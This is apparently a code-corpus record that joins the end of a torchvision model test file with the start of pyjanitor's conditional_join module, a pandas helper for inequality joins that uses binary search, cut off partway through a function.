        model = models.detection.fasterrcnn_resnet50_fpn(num_classes=50, pretrained_backbone=False)
        model.cuda()
        model.eval()
        input_shape = (3, 300, 300)
        x = torch.rand(input_shape, device='cuda')
        model_input = [x]
        out = model(model_input)
        self.assertIs(model_input[0], x)
        checkOut(out)
        with torch.cuda.amp.autocast():
            out = model(model_input)
        checkOut(out)
        # now switch to cpu and make sure it works
        model.cpu()
        x = x.cpu()
        out_cpu = model([x])
        checkOut(out_cpu)
    def test_generalizedrcnn_transform_repr(self):
        """GeneralizedRCNNTransform.__repr__ must match the documented format."""
        min_size, max_size = 224, 299
        image_mean = [0.485, 0.456, 0.406]
        image_std = [0.229, 0.224, 0.225]
        t = models.detection.transform.GeneralizedRCNNTransform(min_size=min_size,
                                                                max_size=max_size,
                                                                image_mean=image_mean,
                                                                image_std=image_std)
        # Check integrity of object __repr__ attribute
        expected_string = 'GeneralizedRCNNTransform('
        _indent = '\n    '
        expected_string += '{0}Normalize(mean={1}, std={2})'.format(_indent, image_mean, image_std)
        expected_string += '{0}Resize(min_size=({1},), max_size={2}, '.format(_indent, min_size, max_size)
        expected_string += "mode='bilinear')\n)"
        self.assertEqual(t.__repr__(), expected_string)
# Devices to generate per-model tests for; CUDA variants only when available.
_devs = ["cpu", "cuda"] if torch.cuda.is_available() else ["cpu"]


for model_name in get_available_classification_models():
    for dev in _devs:
        # for-loop bodies don't define scopes, so we have to save the variables
        # we want to close over in some way
        def do_test(self, model_name=model_name, dev=dev):
            input_shape = (1, 3, 224, 224)
            if model_name in ['inception_v3']:
                # inception_v3 requires 299x299 inputs
                input_shape = (1, 3, 299, 299)
            self._test_classification_model(model_name, input_shape, dev)

        setattr(ModelTester, "test_" + model_name + "_" + dev, do_test)


for model_name in get_available_segmentation_models():
    for dev in _devs:
        # for-loop bodies don't define scopes, so we have to save the variables
        # we want to close over in some way
        def do_test(self, model_name=model_name, dev=dev):
            self._test_segmentation_model(model_name, dev)

        setattr(ModelTester, "test_" + model_name + "_" + dev, do_test)


for model_name in get_available_detection_models():
    for dev in _devs:
        # for-loop bodies don't define scopes, so we have to save the variables
        # we want to close over in some way
        def do_test(self, model_name=model_name, dev=dev):
            self._test_detection_model(model_name, dev)

        setattr(ModelTester, "test_" + model_name + "_" + dev, do_test)

    # The validation test is device-independent, so define and register it
    # once per model (previously this was redundantly redone per device).
    def do_validation_test(self, model_name=model_name):
        self._test_detection_model_validation(model_name)

    setattr(ModelTester, "test_" + model_name + "_validation", do_validation_test)


for model_name in get_available_video_models():
    for dev in _devs:
        def do_test(self, model_name=model_name, dev=dev):
            self._test_video_model(model_name, dev)

        setattr(ModelTester, "test_" + model_name + "_" + dev, do_test)


if __name__ == '__main__':
    unittest.main()
| 39.220183
| 119
| 0.619532
|
acff8255155a8b2d331a4bde1acd37fdecb70f43
| 44,174
|
py
|
Python
|
janitor/functions/conditional_join.py
|
aliavni/pyjanitor
|
245012443d01247a591fd0e931b154c7a12a9753
|
[
"MIT"
] | null | null | null |
janitor/functions/conditional_join.py
|
aliavni/pyjanitor
|
245012443d01247a591fd0e931b154c7a12a9753
|
[
"MIT"
] | null | null | null |
janitor/functions/conditional_join.py
|
aliavni/pyjanitor
|
245012443d01247a591fd0e931b154c7a12a9753
|
[
"MIT"
] | null | null | null |
import operator
from enum import Enum
from typing import Union, Any, Optional, Hashable
import numpy as np
import pandas as pd
import pandas_flavor as pf
from pandas.core.construction import extract_array
from pandas.core.dtypes.common import (
is_categorical_dtype,
is_datetime64_dtype,
is_dtype_equal,
is_extension_array_dtype,
is_numeric_dtype,
is_string_dtype,
)
from pandas.core.reshape.merge import _MergeOperation
from janitor.utils import check, check_column
@pf.register_dataframe_method
def conditional_join(
    df: pd.DataFrame,
    right: Union[pd.DataFrame, pd.Series],
    *conditions,
    how: str = "inner",
    sort_by_appearance: bool = False,
    df_columns: Optional[Any] = None,
    right_columns: Optional[Any] = None,
) -> pd.DataFrame:
    """Join `df` to `right` on inequality, or mixed equi/non-equi, conditions.

    Operates like `pd.merge`, but supports the operators
    `==`, `!=`, `<=`, `<`, `>=`, `>` in the join conditions. Joins solely
    on equality are not supported — use `pd.merge` for those, and
    `pd.merge_asof` for nearest/rolling joins. An `IntervalIndex` is
    usually more efficient for non-overlapping range joins.

    Each condition is a tuple `(left_on, right_on, op)`, where `left_on`
    is a column label in `df`, `right_on` a column label in `right`, and
    `op` one of the operators above. Multiple conditions are combined
    with logical AND. Rows from `df` that satisfy every condition against
    rows from `right` are returned.

    Non-equi conditions are resolved with a binary search rather than a
    cartesian product, keeping memory usage down; equi-joins delegate to
    Pandas' internal merge. Joins happen on columns only — MultiIndex
    columns are not supported, and non-equi conditions require numeric or
    (timezone-naive) datetime columns. Supported join types are `inner`,
    `left`, and `right`. If `df` and `right` share no column labels a
    single-level column index is returned, otherwise a MultiIndex.

    Column selection in `df_columns`/`right_columns` uses the
    [`select_columns`][janitor.functions.select_columns.select_columns]
    syntax; a dictionary can be used to rename output columns.

    :param df: A pandas DataFrame.
    :param right: Named Series or DataFrame to join to.
    :param conditions: Variable argument of `(left_on, right_on, op)`
        tuples, combined with logical AND.
    :param how: Type of join — `inner`, `left`, or `right` (full joins
        are not supported). Defaults to `inner`.
    :param sort_by_appearance: Default `False`. When True, matching rows
        keep the order they had in `df` and `right` before the join;
        useful for strictly non-equi joins.
    :param df_columns: Column(s) to select from `df`; a dictionary
        renames the output columns.
    :param right_columns: Column(s) to select from `right`; a dictionary
        renames the output columns.
    :returns: A pandas DataFrame of the two merged Pandas objects.
    """
    # All validation and the actual join happen in the compute helper.
    return _conditional_join_compute(
        df=df,
        right=right,
        conditions=conditions,
        how=how,
        sort_by_appearance=sort_by_appearance,
        df_columns=df_columns,
        right_columns=right_columns,
    )
class _JoinOperator(Enum):
    """
    List of operators used in conditional_join.

    Member values are the operator strings accepted in join conditions.
    """
    GREATER_THAN = ">"
    LESS_THAN = "<"
    GREATER_THAN_OR_EQUAL = ">="
    LESS_THAN_OR_EQUAL = "<="
    STRICTLY_EQUAL = "=="
    NOT_EQUAL = "!="
class _JoinTypes(Enum):
    """
    List of join types for conditional_join.

    Full outer joins are intentionally not supported.
    """
    INNER = "inner"
    LEFT = "left"
    RIGHT = "right"
# Maps each operator string to the corresponding stdlib comparison function.
operator_map = {
    _JoinOperator.STRICTLY_EQUAL.value: operator.eq,
    _JoinOperator.LESS_THAN.value: operator.lt,
    _JoinOperator.LESS_THAN_OR_EQUAL.value: operator.le,
    _JoinOperator.GREATER_THAN.value: operator.gt,
    _JoinOperator.GREATER_THAN_OR_EQUAL.value: operator.ge,
    _JoinOperator.NOT_EQUAL.value: operator.ne,
}
# Operator groups used to pick the binary-search strategy for non-equi joins.
less_than_join_types = {
    _JoinOperator.LESS_THAN.value,
    _JoinOperator.LESS_THAN_OR_EQUAL.value,
}
greater_than_join_types = {
    _JoinOperator.GREATER_THAN.value,
    _JoinOperator.GREATER_THAN_OR_EQUAL.value,
}
def _check_operator(op: str):
    """Validate that `op` is a supported conditional_join operator.

    Raises ValueError unless `op` is one of
    `>`, `>=`, `==`, `!=`, `<`, `<=`.
    """
    # Note: comprehension variable renamed so it does not shadow `op`.
    sequence_of_operators = {member.value for member in _JoinOperator}
    if op in sequence_of_operators:
        return
    raise ValueError(
        "The conditional join operator "
        f"should be one of {sequence_of_operators}"
    )
def _conditional_join_preliminary_checks(
    df: pd.DataFrame,
    right: Union[pd.DataFrame, pd.Series],
    conditions: tuple,
    how: str,
    sort_by_appearance: bool,
    df_columns: Any,
    right_columns: Any,
) -> tuple:
    """
    Preliminary checks for conditional_join are conducted here.
    Checks include differences in number of column levels,
    length of conditions, existence of columns in dataframe, etc.

    Returns the (copied, normalized) inputs as a tuple in the same order
    they were received; `right` is always a DataFrame afterwards.
    """
    check("right", right, [pd.DataFrame, pd.Series])
    # Copies so index re-assignment downstream never mutates caller data.
    df = df.copy()
    right = right.copy()
    if isinstance(right, pd.Series):
        # A name is required to produce a column label after to_frame().
        if not right.name:
            raise ValueError(
                "Unnamed Series are not supported for conditional_join."
            )
        right = right.to_frame()
    if df.columns.nlevels != right.columns.nlevels:
        raise ValueError(
            "The number of column levels "
            "from the left and right frames must match. "
            "The number of column levels from the left dataframe "
            f"is {df.columns.nlevels}, while the number of column levels "
            f"from the right dataframe is {right.columns.nlevels}."
        )
    if not conditions:
        raise ValueError("Kindly provide at least one join condition.")
    # Each condition must be a (left_on, right_on, op) triple.
    for condition in conditions:
        check("condition", condition, [tuple])
        len_condition = len(condition)
        if len_condition != 3:
            raise ValueError(
                "condition should have only three elements; "
                f"{condition} however is of length {len_condition}."
            )
    for left_on, right_on, op in conditions:
        check("left_on", left_on, [Hashable])
        check("right_on", right_on, [Hashable])
        check("operator", op, [str])
        check_column(df, [left_on])
        check_column(right, [right_on])
        _check_operator(op)
    # Pure equality joins belong to pd.merge, not conditional_join.
    if all(
        (op == _JoinOperator.STRICTLY_EQUAL.value for *_, op in conditions)
    ):
        raise ValueError("Equality only joins are not supported.")
    check("how", how, [str])
    checker = {jointype.value for jointype in _JoinTypes}
    if how not in checker:
        raise ValueError(f"'how' should be one of {checker}.")
    check("sort_by_appearance", sort_by_appearance, [bool])
    # Renaming via dict is ambiguous for MultiIndex columns.
    if (df.columns.nlevels > 1) and (
        isinstance(df_columns, dict) or isinstance(right_columns, dict)
    ):
        raise ValueError(
            "Column renaming with a dictionary is not supported "
            "for MultiIndex columns."
        )
    return (
        df,
        right,
        conditions,
        how,
        sort_by_appearance,
        df_columns,
        right_columns,
    )
def _conditional_join_type_check(
    left_column: pd.Series, right_column: pd.Series, op: str
) -> None:
    """
    Raise error if column type is not any of numeric or datetime or string.

    Also enforces that both columns are dtype-compatible with each other,
    and that non-equi operators are used only with numeric/datetime
    columns.
    """
    permitted_types = {
        is_datetime64_dtype,
        is_numeric_dtype,
        is_string_dtype,
        is_categorical_dtype,
    }
    for func in permitted_types:
        if func(left_column):
            break
    else:
        raise ValueError(
            "conditional_join only supports "
            "string, category, numeric, or date dtypes (without timezone) - "
            # fixed: the column name previously lacked its closing quote
            f"'{left_column.name}' is of type {left_column.dtype}."
        )
    lk_is_cat = is_categorical_dtype(left_column)
    rk_is_cat = is_categorical_dtype(right_column)
    if lk_is_cat & rk_is_cat:
        # Categoricals must share the same categories in the same order
        # for their codes to be comparable.
        if not left_column.array._categories_match_up_to_permutation(
            right_column.array
        ):
            raise ValueError(
                f"'{left_column.name}' and '{right_column.name}' "
                "should have the same categories, and the same order."
            )
    elif not is_dtype_equal(left_column, right_column):
        raise ValueError(
            "Both columns should have the same type - "
            f"'{left_column.name}' has {left_column.dtype} type;"
            f"'{right_column.name}' has {right_column.dtype} type."
        )
    # Ordering comparisons only make sense for numeric/datetime data.
    if (op in less_than_join_types.union(greater_than_join_types)) & (
        (is_string_dtype(left_column) | is_categorical_dtype(left_column))
    ):
        raise ValueError(
            "non-equi joins are supported "
            "only for datetime and numeric dtypes. "
            f"{left_column.name} in condition "
            f"({left_column.name}, {right_column.name}, {op}) "
            f"has a dtype {left_column.dtype}."
        )
    return None
def _conditional_join_compute(
    df: pd.DataFrame,
    right: pd.DataFrame,
    conditions: list,
    how: str,
    sort_by_appearance: bool,
    df_columns: Any,
    right_columns: Any,
) -> pd.DataFrame:
    """
    This is where the actual computation
    for the conditional join takes place.
    A pandas DataFrame is returned.

    Strategy selection: a single condition goes through the generic
    single-condition path; with multiple conditions, any equality
    condition routes to the equi-join path, otherwise any </> condition
    routes to the range path, and pure != conditions go to the ne path.
    """
    (
        df,
        right,
        conditions,
        how,
        sort_by_appearance,
        df_columns,
        right_columns,
    ) = _conditional_join_preliminary_checks(
        df,
        right,
        conditions,
        how,
        sort_by_appearance,
        df_columns,
        right_columns,
    )
    eq_check = False
    le_lt_check = False
    for condition in conditions:
        left_on, right_on, op = condition
        _conditional_join_type_check(df[left_on], right[right_on], op)
        if op == _JoinOperator.STRICTLY_EQUAL.value:
            eq_check = True
        elif op in less_than_join_types.union(greater_than_join_types):
            le_lt_check = True
    # Normalize both indexes to 0..n-1 so the positional indices computed
    # by the search helpers map directly onto rows.
    df.index = range(len(df))
    right.index = range(len(right))
    multiple_conditions = len(conditions) > 1
    if not multiple_conditions:
        left_on, right_on, op = conditions[0]
        result = _generic_func_cond_join(
            df[left_on], right[right_on], op, multiple_conditions
        )
        # None means no rows matched the condition at all.
        if result is None:
            return _create_conditional_join_empty_frame(
                df, right, how, df_columns, right_columns
            )
        return _create_conditional_join_frame(
            df,
            right,
            *result,
            how,
            sort_by_appearance,
            df_columns,
            right_columns,
        )
    if eq_check:
        result = _multiple_conditional_join_eq(df, right, conditions)
    elif le_lt_check:
        result = _multiple_conditional_join_le_lt(df, right, conditions)
    else:
        result = _multiple_conditional_join_ne(df, right, conditions)
    if result is None:
        return _create_conditional_join_empty_frame(
            df, right, how, df_columns, right_columns
        )
    return _create_conditional_join_frame(
        df, right, *result, how, sort_by_appearance, df_columns, right_columns
    )
def _less_than_indices(
    left_c: pd.Series,
    right_c: pd.Series,
    strict: bool,
) -> tuple:
    """
    Use binary search to get indices where left_c
    is less than or equal to right_c.
    If strict is True, then only indices
    where `left_c` is less than
    (but not equal to) `right_c` are returned.
    A tuple of integer indexes
    for left_c and right_c is returned.

    Returns None when no pairing is possible (disjoint ranges, or either
    side empty after dropping nulls).
    """
    # no point going through all the hassle
    if left_c.min() > right_c.max():
        return None
    # Nulls can never satisfy an ordering comparison; drop them up front.
    any_nulls = pd.isna(right_c)
    if any_nulls.any():
        right_c = right_c[~any_nulls]
    if right_c.empty:
        return None
    any_nulls = pd.isna(left_c)
    if any_nulls.any():
        left_c = left_c[~any_nulls]
    if left_c.empty:
        return None
    any_nulls = None
    # searchsorted requires a sorted right side; stable sort preserves
    # the relative order of ties in the original index.
    if not right_c.is_monotonic_increasing:
        right_c = right_c.sort_values(kind="stable")
    left_index = left_c.index.to_numpy(dtype=int, copy=False)
    left_c = extract_array(left_c, extract_numpy=True)
    right_index = right_c.index.to_numpy(dtype=int, copy=False)
    right_c = extract_array(right_c, extract_numpy=True)
    search_indices = right_c.searchsorted(left_c, side="left")
    # if any of the positions in `search_indices`
    # is equal to the length of `right_keys`
    # that means the respective position in `left_c`
    # has no values from `right_c` that are less than
    # or equal, and should therefore be discarded
    len_right = right_c.size
    rows_equal = search_indices == len_right
    if rows_equal.any():
        left_c = left_c[~rows_equal]
        left_index = left_index[~rows_equal]
        search_indices = search_indices[~rows_equal]
    # the idea here is that if there are any equal values
    # shift to the right to the immediate next position
    # that is not equal
    if strict:
        rows_equal = right_c[search_indices]
        rows_equal = left_c == rows_equal
        # replace positions where rows are equal
        # with positions from searchsorted('right')
        # positions from searchsorted('right') will never
        # be equal and will be the furthermost in terms of position
        # example : right_c -> [2, 2, 2, 3], and we need
        # positions where values are not equal for 2;
        # the furthermost will be 3, and searchsorted('right')
        # will return position 3.
        if rows_equal.any():
            replacements = right_c.searchsorted(left_c, side="right")
            # now we can safely replace values
            # with strictly less than positions
            search_indices = np.where(rows_equal, replacements, search_indices)
        # check again if any of the values
        # have become equal to length of right_c
        # and get rid of them
        rows_equal = search_indices == len_right
        if rows_equal.any():
            left_c = left_c[~rows_equal]
            left_index = left_index[~rows_equal]
            search_indices = search_indices[~rows_equal]
    if not search_indices.size:
        return None
    # Every right position from search_indices[i] to the end matches
    # left_index[i]; expand both sides into aligned flat index arrays.
    right_c = [right_index[ind:len_right] for ind in search_indices]
    right_c = np.concatenate(right_c)
    left_c = np.repeat(left_index, len_right - search_indices)
    return left_c, right_c
def _greater_than_indices(
    left_c: pd.Series,
    right_c: pd.Series,
    strict: bool,
    multiple_conditions: bool,
) -> tuple:
    """
    Use binary search to get indices where ``left_c``
    is greater than or equal to ``right_c``.

    :param left_c: Series from the left frame.
    :param right_c: Series from the right frame; sorted here if needed.
    :param strict: if True, only indices where ``left_c`` is strictly
        greater than (not equal to) ``right_c`` are returned.
    :param multiple_conditions: if False, a tuple of integer indexes
        for ``left_c`` and ``right_c`` is returned; else a tuple of
        (left index, right index, searchsorted positions of left in right)
        is returned so the caller can prune further.
    :returns: tuple as described above, or None if there are no matches.
    """
    # quick break, avoiding the hassle:
    # if every left value is below the right minimum, nothing can match
    if left_c.max() < right_c.min():
        return None
    # drop nulls on both sides - they can never satisfy the comparison
    any_nulls = pd.isna(right_c)
    if any_nulls.any():
        right_c = right_c[~any_nulls]
    if right_c.empty:
        return None
    any_nulls = pd.isna(left_c)
    if any_nulls.any():
        left_c = left_c[~any_nulls]
    if left_c.empty:
        return None
    any_nulls = None
    # searchsorted requires a sorted right side; stable keeps index order ties
    if not right_c.is_monotonic_increasing:
        right_c = right_c.sort_values(kind="stable")
    left_index = left_c.index.to_numpy(dtype=int, copy=False)
    left_c = extract_array(left_c, extract_numpy=True)
    right_index = right_c.index.to_numpy(dtype=int, copy=False)
    right_c = extract_array(right_c, extract_numpy=True)
    search_indices = right_c.searchsorted(left_c, side="right")
    # if any of the positions in `search_indices`
    # is equal to 0 (less than 1), it implies that
    # left_c[position] is not greater than any value
    # in right_c
    rows_equal = search_indices < 1
    if rows_equal.any():
        left_c = left_c[~rows_equal]
        left_index = left_index[~rows_equal]
        search_indices = search_indices[~rows_equal]
    # the idea here is that if there are any equal values
    # shift downwards to the immediate next position
    # that is not equal
    if strict:
        rows_equal = right_c[search_indices - 1]
        rows_equal = left_c == rows_equal
        # replace positions where rows are equal with
        # searchsorted('left');
        # however there can be scenarios where positions
        # from searchsorted('left') would still be equal;
        # in that case, we shift down by 1
        if rows_equal.any():
            replacements = right_c.searchsorted(left_c, side="left")
            # `left` might result in values equal to len right_c
            replacements = np.where(
                replacements == right_c.size, replacements - 1, replacements
            )
            # now we can safely replace values
            # with strictly greater than positions
            search_indices = np.where(rows_equal, replacements, search_indices)
        # any value less than 1 should be discarded
        # since the lowest value for binary search
        # with side='right' should be 1
        rows_equal = search_indices < 1
        if rows_equal.any():
            left_c = left_c[~rows_equal]
            left_index = left_index[~rows_equal]
            search_indices = search_indices[~rows_equal]
    if not search_indices.size:
        return None
    if multiple_conditions:
        return left_index, right_index, search_indices
    # expand: each left row matches every right row below its search position
    right_c = [right_index[:ind] for ind in search_indices]
    right_c = np.concatenate(right_c)
    left_c = np.repeat(left_index, search_indices)
    return left_c, right_c
def _not_equal_indices(left_c: pd.Series, right_c: pd.Series) -> tuple:
    """
    Use binary search to get indices where
    ``left_c`` is exactly not equal to ``right_c``.

    It is a combination of strictly-less-than and
    strictly-greater-than indices, plus the null pairings
    (a null on either side is "not equal" to everything on
    the other side).

    :param left_c: Series from the left frame.
    :param right_c: Series from the right frame.
    :returns: tuple of integer indexes for left and right,
        or None if there are no matches.
    """
    dummy = np.array([], dtype=int)
    # deal with nulls: each null row must be paired with
    # every row on the opposite side
    l1_nulls = dummy
    r1_nulls = dummy
    l2_nulls = dummy
    r2_nulls = dummy
    any_left_nulls = left_c.isna()
    any_right_nulls = right_c.isna()
    if any_left_nulls.any():
        l1_nulls = left_c.index[any_left_nulls.array]
        l1_nulls = l1_nulls.to_numpy(copy=False)
        r1_nulls = right_c.index
        # avoid NAN duplicates: null-null pairs are produced
        # only by the right-null block below
        if any_right_nulls.any():
            r1_nulls = r1_nulls[~any_right_nulls.array]
        r1_nulls = r1_nulls.to_numpy(copy=False)
        nulls_count = l1_nulls.size
        # blow up nulls to match length of right (cross product)
        l1_nulls = np.tile(l1_nulls, r1_nulls.size)
        # ensure length of right matches left
        if nulls_count > 1:
            r1_nulls = np.repeat(r1_nulls, nulls_count)
    if any_right_nulls.any():
        r2_nulls = right_c.index[any_right_nulls.array]
        r2_nulls = r2_nulls.to_numpy(copy=False)
        l2_nulls = left_c.index
        nulls_count = r2_nulls.size
        # blow up nulls to match length of left (cross product)
        r2_nulls = np.tile(r2_nulls, l2_nulls.size)
        # ensure length of left matches right
        if nulls_count > 1:
            l2_nulls = np.repeat(l2_nulls, nulls_count)
    l1_nulls = np.concatenate([l1_nulls, l2_nulls])
    r1_nulls = np.concatenate([r1_nulls, r2_nulls])
    # non-null "not equal" rows: strictly less-than plus strictly greater-than
    outcome = _less_than_indices(left_c, right_c, strict=True)
    if outcome is None:
        lt_left = dummy
        lt_right = dummy
    else:
        lt_left, lt_right = outcome
    outcome = _greater_than_indices(
        left_c, right_c, strict=True, multiple_conditions=False
    )
    if outcome is None:
        gt_left = dummy
        gt_right = dummy
    else:
        gt_left, gt_right = outcome
    left_c = np.concatenate([lt_left, gt_left, l1_nulls])
    right_c = np.concatenate([lt_right, gt_right, r1_nulls])
    if (not left_c.size) & (not right_c.size):
        return None
    return left_c, right_c
def _eq_indices(
left_c: pd.Series,
right_c: pd.Series,
) -> tuple:
"""
Use binary search to get indices where left_c
is equal to right_c.
Returns a tuple of the left_index, right_index,
lower_boundary and upper_boundary.
"""
# no point going through all the hassle
if left_c.min() > right_c.max():
return None
if left_c.max() < right_c.min():
return None
any_nulls = pd.isna(right_c)
if any_nulls.any():
right_c = right_c[~any_nulls]
if right_c.empty:
return None
any_nulls = pd.isna(left_c)
if any_nulls.any():
left_c = left_c[~any_nulls]
if left_c.empty:
return None
any_nulls = None
if not right_c.is_monotonic_increasing:
right_c = right_c.sort_values(kind="stable")
left_index = left_c.index.to_numpy(dtype=int, copy=False)
left_c = extract_array(left_c, extract_numpy=True)
right_index = right_c.index.to_numpy(dtype=int, copy=False)
right_c = extract_array(right_c, extract_numpy=True)
lower_boundary = right_c.searchsorted(left_c, side="left")
upper_boundary = right_c.searchsorted(left_c, side="right")
keep_rows = lower_boundary < upper_boundary
if not keep_rows.any():
return None
if not keep_rows.all():
left_index = left_index[keep_rows]
lower_boundary = lower_boundary[keep_rows]
upper_boundary = upper_boundary[keep_rows]
return left_index, right_index, lower_boundary, upper_boundary
def _generic_func_cond_join(
    left_c: pd.Series,
    right_c: pd.Series,
    op: str,
    multiple_conditions: bool,
) -> tuple:
    """
    Dispatch a single non-equi condition to the matching helper
    (``_less_than_indices``, ``_greater_than_indices`` or
    ``_not_equal_indices``).

    :param op: operator string, e.g. ``<``, ``>=``, ``!=``.
    :param multiple_conditions: forwarded to the greater-than helper.
    :returns: whatever the dispatched helper returns
        (None for an unrecognised operator).
    """
    # strict comparison for `<`, `>` and `!=`; inclusive for `<=`, `>=`
    strict = op in {
        _JoinOperator.GREATER_THAN.value,
        _JoinOperator.LESS_THAN.value,
        _JoinOperator.NOT_EQUAL.value,
    }
    if op in less_than_join_types:
        return _less_than_indices(left_c, right_c, strict)
    if op in greater_than_join_types:
        return _greater_than_indices(
            left_c, right_c, strict, multiple_conditions
        )
    if op == _JoinOperator.NOT_EQUAL.value:
        return _not_equal_indices(left_c, right_c)
def _generate_indices(
    left_index: np.ndarray, right_index: np.ndarray, conditions: list
) -> tuple:
    """
    Prune candidate (left_index, right_index) pairs against every
    remaining condition.

    Each entry in ``conditions`` is a tuple of
    ``(Series from df, Series from right, operator string)``.
    A boolean mask is built per condition; rows failing any
    condition are dropped.

    :returns: tuple of (left_index, right_index), or None when
        no row survives a condition.
    """
    for left_s, right_s, op_name in conditions:
        lhs = extract_array(left_s, extract_numpy=True)[left_index]
        rhs = extract_array(right_s, extract_numpy=True)[right_index]
        mask = operator_map[op_name](lhs, rhs)
        if not mask.any():
            return None
        # nullable/extension masks must become plain bool arrays
        # before they can index numpy arrays
        if is_extension_array_dtype(mask):
            mask = mask.to_numpy(dtype=bool, na_value=False)
        if not mask.all():
            left_index = left_index[mask]
            right_index = right_index[mask]
    return left_index, right_index
def _multiple_conditional_join_ne(
    df: pd.DataFrame, right: pd.DataFrame, conditions: list
) -> tuple:
    """
    Get indices for multiple conditions where every operator is `!=`.

    There is no optimisation opportunity here: `!=` combines
    less-than and greater-than matches, so many more rows are
    returned than for a single inequality. The first condition is
    resolved with a binary search; the remaining conditions then
    prune those indices via ``_generate_indices``.

    :returns: tuple of (left_index, right_index), or None.
    """
    first_condition, *other_conditions = conditions
    col_left, col_right, op_symbol = first_condition
    # indices from the first condition seed the search space
    outcome = _generic_func_cond_join(
        df[col_left], right[col_right], op_symbol, multiple_conditions=False
    )
    if outcome is None:
        return None
    remaining = (
        (df[lhs], right[rhs], symbol)
        for lhs, rhs, symbol in other_conditions
    )
    return _generate_indices(*outcome, remaining)
def _multiple_conditional_join_eq(
    df: pd.DataFrame, right: pd.DataFrame, conditions: list
) -> tuple:
    """
    Get indices for multiple conditions,
    if any of the conditions has an `==` operator.

    :param df: left DataFrame.
    :param right: right DataFrame.
    :param conditions: list of (left_column, right_column, op) tuples.
    :returns: tuple of (df_index, right_index), or None.
    """
    # TODO
    # this uses the idea in the `_range_indices` function
    # for less than and greater than;
    # I'd like to believe there is a smarter/more efficient way of doing this
    # where the filter occurs within the join, and avoids a blow-up
    # the current implementation uses
    # a list comprehension to find first matches
    # in a bid to reduce the blow up size ...
    # this applies only to integers/dates
    # and only offers advantages in scenarios
    # where the right is duplicated
    # for one to many joins,
    # or one to one or strings/category, use merge
    # as it is significantly faster than a binary search
    eqs = [
        (left_on, right_on)
        for left_on, right_on, op in conditions
        if op == _JoinOperator.STRICTLY_EQUAL.value
    ]
    left_on, right_on = zip(*eqs)
    left_on = [*left_on]
    right_on = [*right_on]
    strings_or_category = any(
        col
        for col in left_on
        if (is_string_dtype(df[col]) | is_categorical_dtype(df[col]))
    )
    # fast path: delegate the equality part to pandas' merge machinery
    # when either side is unique on the join keys, or keys are
    # strings/categories (merge beats a binary search there)
    if (
        strings_or_category
        | (not right.duplicated(subset=right_on).any(axis=None))
        | (not df.duplicated(subset=left_on).any(axis=None))
    ):
        rest = (
            (df[left_on], right[right_on], op)
            for left_on, right_on, op in conditions
            if op != _JoinOperator.STRICTLY_EQUAL.value
        )
        left_index, right_index = _MergeOperation(
            df,
            right,
            left_on=left_on,
            right_on=right_on,
            sort=False,
            copy=False,
        )._get_join_indexers()
        if not left_index.size:
            return None
        return _generate_indices(left_index, right_index, rest)
    # slow path: binary-search the first equality condition;
    # each left row gets a [lower, upper) window into right_index
    left_on, right_on = eqs[0]
    outcome = _eq_indices(df[left_on], right[right_on])
    if not outcome:
        return None
    left_index, right_index, lower_boundary, upper_boundary = outcome
    # NOTE(review): `condition` is a 3-tuple while `eqs[0]` is a
    # 2-tuple, so this comparison never filters anything out and
    # eq_check == conditions; re-checking the equality condition later
    # is redundant (though harmless) - confirm intent upstream.
    eq_check = [condition for condition in conditions if condition != eqs[0]]
    rest = [
        (df.loc[left_index, left_on], right.loc[right_index, right_on], op)
        for left_on, right_on, op in eq_check
    ]
    rest = [
        (
            extract_array(left_c, extract_numpy=True),
            extract_array(right_c, extract_numpy=True),
            operator_map[op],
        )
        for left_c, right_c, op in rest
    ]

    def _extension_array_check(arr):
        """
        Convert a boolean extension array to a plain numpy
        boolean array (NA becomes False); pass through otherwise.
        """
        if is_extension_array_dtype(arr):
            return arr.to_numpy(dtype=bool, na_value=False, copy=False)
        return arr

    # `pos` will hold, per left row, the first right position inside
    # the equality window that satisfies all remaining conditions;
    # initialised to the (exclusive) upper bound, i.e. "no match yet"
    pos = np.copy(upper_boundary)
    upper = np.copy(upper_boundary)
    counter = np.arange(left_index.size)
    # faster within C/Rust? better implemented within Pandas itself?
    # the idea here is that lower_boundary moves up by 1
    # till it gets to upper_boundary;
    # if we get all our matches before the end of the iteration, even better
    for _ in range((upper_boundary - lower_boundary).max()):
        if not counter.size:
            break
        # drop rows whose window has been exhausted
        if (lower_boundary == upper).any():
            keep_rows = lower_boundary < upper
            rest = [
                (left_c[keep_rows], right_c, op)
                for left_c, right_c, op in rest
            ]
            lower_boundary = lower_boundary[keep_rows]
            upper = upper[keep_rows]
            counter = counter[keep_rows]
        keep_rows = [
            op(left_c, right_c[lower_boundary]) for left_c, right_c, op in rest
        ]
        keep_rows = [_extension_array_check(arr) for arr in keep_rows]
        keep_rows = np.logical_and.reduce(keep_rows)
        if not keep_rows.any():
            lower_boundary += 1
            continue
        # record the first matching position and retire those rows
        pos[counter[keep_rows]] = lower_boundary[keep_rows]
        counter = counter[~keep_rows]
        rest = [
            (left_c[~keep_rows], right_c, op) for left_c, right_c, op in rest
        ]
        upper = upper[~keep_rows]
        lower_boundary = lower_boundary[~keep_rows]
        lower_boundary += 1
    # rows where pos never moved below upper_boundary found no match
    keep_rows = pos < upper_boundary
    if not keep_rows.any():
        return None
    if not keep_rows.all():
        left_index = left_index[keep_rows]
        pos = pos[keep_rows]
        upper_boundary = upper_boundary[keep_rows]
    repeater = upper_boundary - pos
    right_index = [
        right_index[start:end] for start, end in zip(pos, upper_boundary)
    ]
    right_index = np.concatenate(right_index)
    left_index = np.repeat(left_index, repeater)
    # final exact filter over the blown-up candidate pairs
    eq_check = [
        (df[left_on], right[right_on], op)
        for left_on, right_on, op in eq_check
    ]
    return _generate_indices(left_index, right_index, eq_check)
def _multiple_conditional_join_le_lt(
    df: pd.DataFrame, right: pd.DataFrame, conditions: list
) -> tuple:
    """
    Get indices for multiple conditions,
    where `>/>=` or `</<=` is present,
    and there is no `==` operator.

    A pair of one less-than and one greater-than condition forms a
    range join (usually ``lower < value < upper``, or
    ``lower < a`` and ``b < upper``) and goes through the optimised
    ``_range_indices`` path. An IntervalIndex is not used because it
    cannot efficiently return indices for overlapping intervals, nor
    does it cover range joins across different columns. Without a
    range pair, one non-equi condition is resolved with a binary
    search (a full blow-up of candidate rows is unavoidable) and the
    remaining conditions prune the result.

    :param df: left DataFrame.
    :param right: right DataFrame.
    :param conditions: list of (left_column, right_column, op) tuples.
    :returns: tuple of (df_index, right_index), or None.
    """
    # keep the first less-than and the first greater-than condition;
    # if both exist, the range-join optimisation applies
    le_lt = None
    ge_gt = None
    for condition in conditions:
        *_, op = condition
        if op in less_than_join_types:
